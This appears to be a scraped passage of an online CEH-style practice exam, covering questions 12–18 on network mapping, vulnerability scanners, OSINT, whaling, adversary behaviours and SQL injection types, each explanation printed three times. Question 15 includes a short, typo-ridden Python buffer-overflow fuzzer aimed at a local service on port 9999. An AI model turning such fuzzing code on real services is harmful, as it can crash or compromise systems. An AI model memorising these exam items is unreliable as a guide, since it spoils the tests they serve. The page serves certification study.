https://info-savvy.com/top-8-most-useful-vulnerability-assessments/ External Assessments External assessment assesses the network from a hackers point of view to find out what exploits and vulnerabilities are accessible to the outside world. These types of assessments use external devices like firewalls, routers, and servers. An external assessment estimates the threat of network security attacks external to the organization. it determines how secure the external network and firewall are. Incorrect answers: Host-based Assessments Host-based assessments are a type of security check that involves carrying out a configuration-level check through the command line. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as incorrect registry and file permissions, as well as software configuration errors. Host-based assessment can use many commercial and open-source scanning tools. Passive Assessments Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerability assessments. Even passive assessments provide a list of the users who are recently using the network. Active Assessments Active evaluation is a type of vulnerability assessment that uses network scanners to scan the network to identify the hosts, services, and vulnerabilities present in that network. These network scanners have the capability to reduce the intrusiveness of the checks they perform.
Question 12 of 65
12. Question
The attacker wants to draw a map of the target organization‘s network infrastructure to know about the actual environment they will hack. Which of the following will allow him to do this?
Correct
https://en.wikipedia.org/wiki/Network_mapping https://w4rri0r.com/hacking-tools-windows-os-x-linux-android-solaris-unixware/network-mapping.html It would be much more logical to use the phrase “Network mapper,“ but you can meet a question on this topic with exactly this wording on the exam. The network map provides a topology view of your network to help you visualize network partitions, dependencies, and bottlenecks. Network mapping is the process of visualizing all the devices on network, how theyre connected, and how the overall network is structured. There are two main levels of maps to consider: physical and logical. While open-source network mapping tools can create a physical network map, they may not offer automated scanning to ensure the map is always up to date. There are three levels of maps to considerphysical, logical, and functional. A physical network map diagrams all the actual components of your network, including cords, plugs, racks, ports, servers, cables, and more. A physical network map gives you a visual representation of all the material elements of your network and the connections between them. A logical map is more abstract than the physical network map. It shows the type of network topology (bus, ring, etc.), and how the data flows between the physical objects in your network. This includes IP addresses, firewalls, routers, subnets and subnet masks, traffic flow, voice gateways, and other segments of the network. To note: Since logical and physical network maps depict the same network environment from two different perspectives, its best to use both types to get a more comprehensive look at your network. A functional network map shows you how application traffic flows through the network physically. These types of network maps are only as useful as they are accurate, which means you need an appropriate and high-quality tool. Incorrect answers: Vulnerability Analysis A vulnerability analysis is a review that focuses on security-relevant issues that either moderately or severely impact the security of the product or system. Malware analysis https://en.wikipedia.org/wiki/Malware_analysis Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor. Malware or malicious software is any computer software intended to harm the host operating system or to steal sensitive data from users, organizations or companies. Malware may include software that gathers user information without permission. Network enumeration https://en.wikipedia.org/wiki/Network_enumeration Network enumeration is a computing activity in which usernames and info on groups, shares, and services of networked computers are retrieved. It should not be confused with network mapping, which only retrieves information about which servers are connected to a specific network and what operating system runs on them. Network enumeration is the discovery of hosts or devices on a network. Network enumeration tends to use overt discovery protocols such as ICMP and SNMP to gather information. It may also scan various ports on remote hosts for looking for well known services in an attempt to further identify the function of a remote host. The next stage of enumeration is to fingerprint the operating system of the remote host.
Incorrect
https://en.wikipedia.org/wiki/Network_mapping https://w4rri0r.com/hacking-tools-windows-os-x-linux-android-solaris-unixware/network-mapping.html It would be much more logical to use the phrase “Network mapper,“ but you can meet a question on this topic with exactly this wording on the exam. The network map provides a topology view of your network to help you visualize network partitions, dependencies, and bottlenecks. Network mapping is the process of visualizing all the devices on network, how theyre connected, and how the overall network is structured. There are two main levels of maps to consider: physical and logical. While open-source network mapping tools can create a physical network map, they may not offer automated scanning to ensure the map is always up to date. There are three levels of maps to considerphysical, logical, and functional. A physical network map diagrams all the actual components of your network, including cords, plugs, racks, ports, servers, cables, and more. A physical network map gives you a visual representation of all the material elements of your network and the connections between them. A logical map is more abstract than the physical network map. It shows the type of network topology (bus, ring, etc.), and how the data flows between the physical objects in your network. This includes IP addresses, firewalls, routers, subnets and subnet masks, traffic flow, voice gateways, and other segments of the network. To note: Since logical and physical network maps depict the same network environment from two different perspectives, its best to use both types to get a more comprehensive look at your network. A functional network map shows you how application traffic flows through the network physically. These types of network maps are only as useful as they are accurate, which means you need an appropriate and high-quality tool. Incorrect answers: Vulnerability Analysis A vulnerability analysis is a review that focuses on security-relevant issues that either moderately or severely impact the security of the product or system. Malware analysis https://en.wikipedia.org/wiki/Malware_analysis Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor. Malware or malicious software is any computer software intended to harm the host operating system or to steal sensitive data from users, organizations or companies. Malware may include software that gathers user information without permission. Network enumeration https://en.wikipedia.org/wiki/Network_enumeration Network enumeration is a computing activity in which usernames and info on groups, shares, and services of networked computers are retrieved. It should not be confused with network mapping, which only retrieves information about which servers are connected to a specific network and what operating system runs on them. Network enumeration is the discovery of hosts or devices on a network. Network enumeration tends to use overt discovery protocols such as ICMP and SNMP to gather information. It may also scan various ports on remote hosts for looking for well known services in an attempt to further identify the function of a remote host. The next stage of enumeration is to fingerprint the operating system of the remote host.
Unattempted
https://en.wikipedia.org/wiki/Network_mapping https://w4rri0r.com/hacking-tools-windows-os-x-linux-android-solaris-unixware/network-mapping.html It would be much more logical to use the phrase “Network mapper,“ but you can meet a question on this topic with exactly this wording on the exam. The network map provides a topology view of your network to help you visualize network partitions, dependencies, and bottlenecks. Network mapping is the process of visualizing all the devices on network, how theyre connected, and how the overall network is structured. There are two main levels of maps to consider: physical and logical. While open-source network mapping tools can create a physical network map, they may not offer automated scanning to ensure the map is always up to date. There are three levels of maps to considerphysical, logical, and functional. A physical network map diagrams all the actual components of your network, including cords, plugs, racks, ports, servers, cables, and more. A physical network map gives you a visual representation of all the material elements of your network and the connections between them. A logical map is more abstract than the physical network map. It shows the type of network topology (bus, ring, etc.), and how the data flows between the physical objects in your network. This includes IP addresses, firewalls, routers, subnets and subnet masks, traffic flow, voice gateways, and other segments of the network. To note: Since logical and physical network maps depict the same network environment from two different perspectives, its best to use both types to get a more comprehensive look at your network. A functional network map shows you how application traffic flows through the network physically. These types of network maps are only as useful as they are accurate, which means you need an appropriate and high-quality tool. Incorrect answers: Vulnerability Analysis A vulnerability analysis is a review that focuses on security-relevant issues that either moderately or severely impact the security of the product or system. Malware analysis https://en.wikipedia.org/wiki/Malware_analysis Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor. Malware or malicious software is any computer software intended to harm the host operating system or to steal sensitive data from users, organizations or companies. Malware may include software that gathers user information without permission. Network enumeration https://en.wikipedia.org/wiki/Network_enumeration Network enumeration is a computing activity in which usernames and info on groups, shares, and services of networked computers are retrieved. It should not be confused with network mapping, which only retrieves information about which servers are connected to a specific network and what operating system runs on them. Network enumeration is the discovery of hosts or devices on a network. Network enumeration tends to use overt discovery protocols such as ICMP and SNMP to gather information. It may also scan various ports on remote hosts for looking for well known services in an attempt to further identify the function of a remote host. The next stage of enumeration is to fingerprint the operating system of the remote host.
Question 13 of 65
13. Question
Experienced employees of the EC-Council monitor the market of security providers every day in search of the best solutions for your business. According to EC-Council experts, which vulnerability scanner combines comprehensive static and dynamic security checks to detect vulnerabilities such as XSS, File Inclusion, SQL injection, command execution, and more?
Correct
https://www.syhunt.com/en/?n=Products.SyhuntHybrid Syhunt Hybrid combines comprehensive static and dynamic security scans to detect vulnerabilities like XSS, File Inclusion, SQL Injection, Command Execution and many more, including inferential, in-band and out-of-band attacks through Hybrid-Augmented Analysis (HAST). With Syhunt‘s unique gray box/hybrid scanning capability the information acquired during source code scans is automatically used to create and enhance dynamic scans. All entry points are covered generating detailed information about the security level of your web applications. Available for on-premises deployment for businesses using Windows and Linux 64-bit. Incorrect answers: AT&T USM Anywhere https://cybersecurity.att.com/products/usm-anywhere USM Anywhere centralizes security monitoring of networks and devices in the cloud, on-premises, and in remote locations, helping you to detect threats virtually anywhere. Saleae Logic Analyzer https://www.saleae.com/ It is a powerful logic analyzer that lets you record and display signals in your circuit, so you can debug it fast. From Arduino projects to spacecraft control systems, over 20,000 professionals and enthusiasts use Logic each month to debug and understand their electrical designs. Cisco ASA https://en.wikipedia.org/wiki/Cisco_ASA Cisco ASA (Adaptive Security Appliance) is a series of hardware firewalls developed by Cisco Systems. NOTE: I know I know. How will this “knowledge“ help me in my work? It won‘t. This knowledge is required only for the exam.
Incorrect
https://www.syhunt.com/en/?n=Products.SyhuntHybrid Syhunt Hybrid combines comprehensive static and dynamic security scans to detect vulnerabilities like XSS, File Inclusion, SQL Injection, Command Execution and many more, including inferential, in-band and out-of-band attacks through Hybrid-Augmented Analysis (HAST). With Syhunt‘s unique gray box/hybrid scanning capability the information acquired during source code scans is automatically used to create and enhance dynamic scans. All entry points are covered generating detailed information about the security level of your web applications. Available for on-premises deployment for businesses using Windows and Linux 64-bit. Incorrect answers: AT&T USM Anywhere https://cybersecurity.att.com/products/usm-anywhere USM Anywhere centralizes security monitoring of networks and devices in the cloud, on-premises, and in remote locations, helping you to detect threats virtually anywhere. Saleae Logic Analyzer https://www.saleae.com/ It is a powerful logic analyzer that lets you record and display signals in your circuit, so you can debug it fast. From Arduino projects to spacecraft control systems, over 20,000 professionals and enthusiasts use Logic each month to debug and understand their electrical designs. Cisco ASA https://en.wikipedia.org/wiki/Cisco_ASA Cisco ASA (Adaptive Security Appliance) is a series of hardware firewalls developed by Cisco Systems. NOTE: I know I know. How will this “knowledge“ help me in my work? It won‘t. This knowledge is required only for the exam.
Unattempted
https://www.syhunt.com/en/?n=Products.SyhuntHybrid Syhunt Hybrid combines comprehensive static and dynamic security scans to detect vulnerabilities like XSS, File Inclusion, SQL Injection, Command Execution and many more, including inferential, in-band and out-of-band attacks through Hybrid-Augmented Analysis (HAST). With Syhunt‘s unique gray box/hybrid scanning capability the information acquired during source code scans is automatically used to create and enhance dynamic scans. All entry points are covered generating detailed information about the security level of your web applications. Available for on-premises deployment for businesses using Windows and Linux 64-bit. Incorrect answers: AT&T USM Anywhere https://cybersecurity.att.com/products/usm-anywhere USM Anywhere centralizes security monitoring of networks and devices in the cloud, on-premises, and in remote locations, helping you to detect threats virtually anywhere. Saleae Logic Analyzer https://www.saleae.com/ It is a powerful logic analyzer that lets you record and display signals in your circuit, so you can debug it fast. From Arduino projects to spacecraft control systems, over 20,000 professionals and enthusiasts use Logic each month to debug and understand their electrical designs. Cisco ASA https://en.wikipedia.org/wiki/Cisco_ASA Cisco ASA (Adaptive Security Appliance) is a series of hardware firewalls developed by Cisco Systems. NOTE: I know I know. How will this “knowledge“ help me in my work? It won‘t. This knowledge is required only for the exam.
Question 14 of 65
14. Question
Which of the following frameworks contains a set of the most popular tools that facilitate your tasks of collecting information and data from open sources?
Correct
https://osintframework.com/ This tool is mainly used by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance. It provides a simple web-based interface that allows you to browse different OSINT tools filtered by categories. It also provides an excellent classification of all existing intel sources, making it an excellent resource for knowing what infosec areas you are neglecting to explore or the next suggested OSINT steps for your investigation. Incorrect answers: WebSploit Framework https://sourceforge.net/projects/websploit/ This is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilities. This tool is very powerful and support multiple vulnerabilities. BeEF https://beefproject.com/ This is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Speed Phish Framework https://github.com/tatanus/SPF SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.
Incorrect
https://osintframework.com/ This tool is mainly used by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance. It provides a simple web-based interface that allows you to browse different OSINT tools filtered by categories. It also provides an excellent classification of all existing intel sources, making it an excellent resource for knowing what infosec areas you are neglecting to explore or the next suggested OSINT steps for your investigation. Incorrect answers: WebSploit Framework https://sourceforge.net/projects/websploit/ This is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilities. This tool is very powerful and support multiple vulnerabilities. BeEF https://beefproject.com/ This is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Speed Phish Framework https://github.com/tatanus/SPF SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.
Unattempted
https://osintframework.com/ This tool is mainly used by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance. It provides a simple web-based interface that allows you to browse different OSINT tools filtered by categories. It also provides an excellent classification of all existing intel sources, making it an excellent resource for knowing what infosec areas you are neglecting to explore or the next suggested OSINT steps for your investigation. Incorrect answers: WebSploit Framework https://sourceforge.net/projects/websploit/ This is an open source project which is used to scan and analysis remote system in order to find various type of vulnerabilities. This tool is very powerful and support multiple vulnerabilities. BeEF https://beefproject.com/ This is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Speed Phish Framework https://github.com/tatanus/SPF SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.
Question 15 of 65
15. Question
Identify what the following code is used for: #!/usr/bin/python import socket buffer=[“A“] counter=50 while len(buffer)<=100: buffer.apend (“A“*counter) counter=counter+50 commands=[“HELP“,“STATS.“,“RTIME.“,“LTIME.“,“SRUN.“,“TRUN.“,“GMON.“,“GDOG.“,“KSTET.“,“GTER.“,“HTER.“,“LTER.“,“KSTAN.“] for command in commands: for buffstring in buffer: print “Exploiting“ +command+“:“+str(len(buffstring)) s=socket.socket(socket.AF_INET.socket.SOCK_STREAM) s.connect((127.0.0.1,9999)) s.recv(50) s.send(command+buffstring) s.close()
Correct
https://en.wikipedia.org/wiki/Buffer_overflow This example shows a loop that fills up an array with As in each iteration and sends them to the victim. A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer‘s boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program‘s state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer‘s resources. The famed Morris worm in 1988 used this as one of its attack techniques. Incorrect answers: Heap spraying https://en.wikipedia.org/wiki/Heap_spraying Heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process‘s heap and fill the bytes in these blocks with the right values. Buffer over-read https://en.wikipedia.org/wiki/Buffer_over-read A buffer over-read is an anomaly where a program, while reading data from a buffer, overruns the buffer‘s boundary and reads (or tries to read) adjacent memory. This is a special case of violation of memory safety. Buffer over-reads can be triggered, as in the Heartbleed bug, by maliciously crafted inputs that are designed to exploit a lack of bounds checking to read parts of memory not intended to be accessible. They may also be caused by programming errors alone. Buffer over-reads can result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited to access privileged information. Brute-force https://en.wikipedia.org/wiki/Brute-force_attack A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Incorrect
https://en.wikipedia.org/wiki/Buffer_overflow This example shows a loop that fills up an array with As in each iteration and sends them to the victim. A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer‘s boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program‘s state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer‘s resources. The famed Morris worm in 1988 used this as one of its attack techniques. Incorrect answers: Heap spraying https://en.wikipedia.org/wiki/Heap_spraying Heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process‘s heap and fill the bytes in these blocks with the right values. Buffer over-read https://en.wikipedia.org/wiki/Buffer_over-read A buffer over-read is an anomaly where a program, while reading data from a buffer, overruns the buffer‘s boundary and reads (or tries to read) adjacent memory. This is a special case of violation of memory safety. Buffer over-reads can be triggered, as in the Heartbleed bug, by maliciously crafted inputs that are designed to exploit a lack of bounds checking to read parts of memory not intended to be accessible. They may also be caused by programming errors alone. Buffer over-reads can result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited to access privileged information. Brute-force https://en.wikipedia.org/wiki/Brute-force_attack A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Unattempted
https://en.wikipedia.org/wiki/Buffer_overflow This example shows a loop that fills up an array with As in each iteration and sends them to the victim. A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer‘s boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program‘s state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer‘s resources. The famed Morris worm in 1988 used this as one of its attack techniques. Incorrect answers: Heap spraying https://en.wikipedia.org/wiki/Heap_spraying Heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process‘s heap and fill the bytes in these blocks with the right values. Buffer over-read https://en.wikipedia.org/wiki/Buffer_over-read A buffer over-read is an anomaly where a program, while reading data from a buffer, overruns the buffer‘s boundary and reads (or tries to read) adjacent memory. This is a special case of violation of memory safety. Buffer over-reads can be triggered, as in the Heartbleed bug, by maliciously crafted inputs that are designed to exploit a lack of bounds checking to read parts of memory not intended to be accessible. They may also be caused by programming errors alone. Buffer over-reads can result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited to access privileged information. Brute-force https://en.wikipedia.org/wiki/Brute-force_attack A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
Question 16 of 65
16. Question
Lisandro plans to steal confidential information from the company, for this he uses a phishing attack in which he sends a letter to an employee of the company on behalf of one of the senior managers of the company (or even the CEO himself) with instructions to urgently provide the necessary information. What type of phishing is used in the attack?
Correct
https://www.ncsc.gov.uk/guidance/whaling-how-it-works-and-what-your-organisation-can-do-about-it A whaling attack is a method used by cybercriminals to masquerade as a senior player at an organization and directly target senior or other important individuals at an organization to steal money or sensitive information or gain access to their computer systems for criminal purposes. Also known as CEO fraud. These attacks can be made all the more believable when cybercriminals use significant research that utilizes openly available resources such as social media to craft a bespoke approach that‘s tailored for those target individuals. For Example https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email In 2016, an employee at Snapchat disclosed all of the companys payroll data to a scammer the employee had responded to an email that looked to be from the CEO and responded promptly. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data. Incorrect answers: Smishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Smishing is a form of phishing that uses mobile phones as the attack platform. Vishing https://en.wikipedia.org/wiki/Phishing#Voice_phishing Voice phishing, or vishing, is the use of telephony (often Voice over IP telephony) to conduct phishing attacks. Clone phishing https://en.wikipedia.org/wiki/Phishing#Clone_phishing Clone phishing is a type of phishing attack whereby a legitimate, and previously delivered email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. Typically this requires either the sender or recipient to have been previously hacked for the malicious third party to obtain the legitimate email.
Incorrect
https://www.ncsc.gov.uk/guidance/whaling-how-it-works-and-what-your-organisation-can-do-about-it A whaling attack is a method used by cybercriminals to masquerade as a senior player at an organization and directly target senior or other important individuals at an organization to steal money or sensitive information or gain access to their computer systems for criminal purposes. Also known as CEO fraud. These attacks can be made all the more believable when cybercriminals use significant research that utilizes openly available resources such as social media to craft a bespoke approach that‘s tailored for those target individuals. For Example https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email In 2016, an employee at Snapchat disclosed all of the companys payroll data to a scammer the employee had responded to an email that looked to be from the CEO and responded promptly. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data. Incorrect answers: Smishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Smishing is a form of phishing that uses mobile phones as the attack platform. Vishing https://en.wikipedia.org/wiki/Phishing#Voice_phishing Voice phishing, or vishing, is the use of telephony (often Voice over IP telephony) to conduct phishing attacks. Clone phishing https://en.wikipedia.org/wiki/Phishing#Clone_phishing Clone phishing is a type of phishing attack whereby a legitimate, and previously delivered email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. Typically this requires either the sender or recipient to have been previously hacked for the malicious third party to obtain the legitimate email.
Unattempted
https://www.ncsc.gov.uk/guidance/whaling-how-it-works-and-what-your-organisation-can-do-about-it A whaling attack is a method used by cybercriminals to masquerade as a senior player at an organization and directly target senior or other important individuals at an organization to steal money or sensitive information or gain access to their computer systems for criminal purposes. Also known as CEO fraud. These attacks can be made all the more believable when cybercriminals use significant research that utilizes openly available resources such as social media to craft a bespoke approach that‘s tailored for those target individuals. For Example https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email In 2016, an employee at Snapchat disclosed all of the companys payroll data to a scammer the employee had responded to an email that looked to be from the CEO and responded promptly. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data. Incorrect answers: Smishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Smishing is a form of phishing that uses mobile phones as the attack platform. Vishing https://en.wikipedia.org/wiki/Phishing#Voice_phishing Voice phishing, or vishing, is the use of telephony (often Voice over IP telephony) to conduct phishing attacks. Clone phishing https://en.wikipedia.org/wiki/Phishing#Clone_phishing Clone phishing is a type of phishing attack whereby a legitimate, and previously delivered email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version to the original. Typically this requires either the sender or recipient to have been previously hacked for the malicious third party to obtain the legitimate email.
Question 17 of 65
17. Question
Which of the scenarios corresponds to the behaviour of the attacker from the example below: The attacker created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Correct
You will probably find such a classification of Adversarial Behavioral Identification only in the EC-Council‘s training materials. Still, you can find a question on this topic on the exam, so you need to understand it. Unspecified Proxy Activities An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Use of Command-Line Interface On gaining access to the target system, an adversary can use the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Data staging After successfully penetrating a targets network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, financial information, etc. DNS tunnelling Adversaries use DNS tunnelling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunnelling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration.
Incorrect
You will probably find such a classification of Adversarial Behavioral Identification only in the EC-Council‘s training materials. Still, you can find a question on this topic on the exam, so you need to understand it. Unspecified Proxy Activities An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Use of Command-Line Interface On gaining access to the target system, an adversary can use the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Data staging After successfully penetrating a targets network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, financial information, etc. DNS tunnelling Adversaries use DNS tunnelling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunnelling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration.
Unattempted
You will probably find such a classification of Adversarial Behavioral Identification only in the EC-Council‘s training materials. Still, you can find a question on this topic on the exam, so you need to understand it. Unspecified Proxy Activities An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Use of Command-Line Interface On gaining access to the target system, an adversary can use the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Data staging After successfully penetrating a targets network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, financial information, etc. DNS tunnelling Adversaries use DNS tunnelling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunnelling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration.
Question 18 of 65
18. Question
Identify the type of SQLi by description: This type of SQLi doesn‘t show any error message. Its use may be problematic due to as it returns information when the application is given SQL payloads that elicit a true or false response from the server. When the attacker uses this method, an attacker can extract confidential information by observing the responses.
Correct
https://en.wikipedia.org/wiki/SQL_injection Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. Incorrect answers: Union-based SQLi Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response. Out-of-band SQLi Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable). Out-of-band SQLi techniques would rely on the database servers ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Servers xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Databases UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls. Error-based SQLi Error-based SQL injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or gain information on how to restructure the query for further exploitation.
Incorrect
https://en.wikipedia.org/wiki/SQL_injection Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. Incorrect answers: Union-based SQLi Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response. Out-of-band SQLi Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable). Out-of-band SQLi techniques would rely on the database servers ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Servers xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Databases UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls. Error-based SQLi Error-based SQL injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or gain information on how to restructure the query for further exploitation.
Unattempted
